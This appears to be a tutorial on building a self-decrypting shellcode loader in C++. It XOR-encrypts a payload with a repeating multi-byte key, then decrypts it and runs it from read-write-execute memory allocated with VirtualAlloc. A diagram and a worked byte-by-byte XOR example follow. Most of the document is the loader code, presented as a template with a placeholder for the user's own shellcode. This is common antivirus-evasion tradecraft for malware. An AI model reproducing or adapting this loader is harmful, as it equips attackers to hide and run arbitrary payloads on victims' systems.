1b. XOR-Based Self-Decrypting Payload (With Memory Execution)

1. XOR-Based Self-Decrypting Payload (C++)

Step 1: Encrypt the Shellcode

#include <iostream>
#include <windows.h>  // For PBYTE type

/*
	- pShellcode : Base address of the payload to encrypt 
	- sShellcodeSize : The size of the payload 
	- bKey : A random array of bytes of specific size
	- sKeySize : The size of the key
*/
void XorByInputKey(PBYTE pShellcode, SIZE_T sShellcodeSize, PBYTE bKey, SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0;  // Reset key index when reaching the end
        }
        pShellcode[i] ^= bKey[j];  // XOR encryption
    }
}

int main() {
    unsigned char shellcode[] = { /* Your original shellcode */ };
    SIZE_T shellcode_size = sizeof(shellcode);

    unsigned char key[] = { 0xAA, 0xBB, 0xCC }; // Multi-byte key
    SIZE_T key_size = sizeof(key);

    std::cout << "Original Shellcode: ";
    for (SIZE_T i = 0; i < shellcode_size; i++) {
        std::cout << "0x" << std::hex << (int)shellcode[i] << " ";
    }
    std::cout << "\n";

    // Encrypt the shellcode
    XorByInputKey(shellcode, shellcode_size, key, key_size);

    std::cout << "Encrypted Shellcode: ";
    for (SIZE_T i = 0; i < shellcode_size; i++) {
        std::cout << "0x" << std::hex << (int)shellcode[i] << " ";
    }
    std::cout << "\n";

    // Decrypt before execution
    XorByInputKey(shellcode, shellcode_size, key, key_size);

    // Allocate executable memory
    void* exec_mem = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed!\n";
        return 1;
    }

    // Copy decrypted shellcode to allocated memory
    memcpy(exec_mem, shellcode, shellcode_size);

    // Execute the shellcode
    ((void(*)())exec_mem)();

    return 0;
}

Concept Overview


XOR Encryption Process

sequenceDiagram
    participant Payload as Shellcode (pShellcode)
    participant Key as XOR Key (bKey)
    participant Output as Encrypted Data
    
    loop For each byte in pShellcode
        Payload->>Key: Get key byte (bKey[j])
        Key->>Payload: XOR with payload byte
        Payload->>Output: Store encrypted byte
        Key-->>Payload: Move to next key byte (j+1)
        alt If j >= sKeySize
            Key->>Payload: Reset j to 0 (Key starts again)
        end
    end

Step-by-Step Walkthrough (With Example)

Let's assume:

i (index) pShellcode[i] (original) bKey[j] (key) XOR Output (pShellcode[i] ^= bKey[j])
0 0x41 (A) 0xAA 0xEB
1 0x42 (B) 0xBB 0xF9
2 0x43 (C) 0xCC 0x8F
3 0x44 (D) 0xAA 0xEE (Key loops)
4 0x45 (E) 0xBB 0xFE (Key loops)

So, the encrypted payload will be:

0xEB, 0xF9, 0x8F, 0xEE, 0xFE

If you call XorByInputKey again on the encrypted data, it decrypts back to the original (XOR is symmetric).


Visualization: How Key Loops Over Payload

Original Shellcode:    A    B    C    D    E
Hex Representation:   41   42   43   44   45
XOR Key (Repeating):  AA   BB   CC   AA   BB
Encrypted Output:     EB   F9   8F   EE   FE

Since the key is shorter than the shellcode, it cycles back after the third byte.


Memory Representation

pShellcode:   [ 0x41, 0x42, 0x43, 0x44, 0x45 ]  (A, B, C, D, E)
bKey:         [ 0xAA, 0xBB, 0xCC ]  (Key repeats every 3 bytes)
pShellcode:   [ 0xEB, 0xF9, 0x8F, 0xEE, 0xFE ]
pShellcode:   [ 0x41, 0x42, 0x43, 0x44, 0x45 ]  (A, B, C, D, E restored)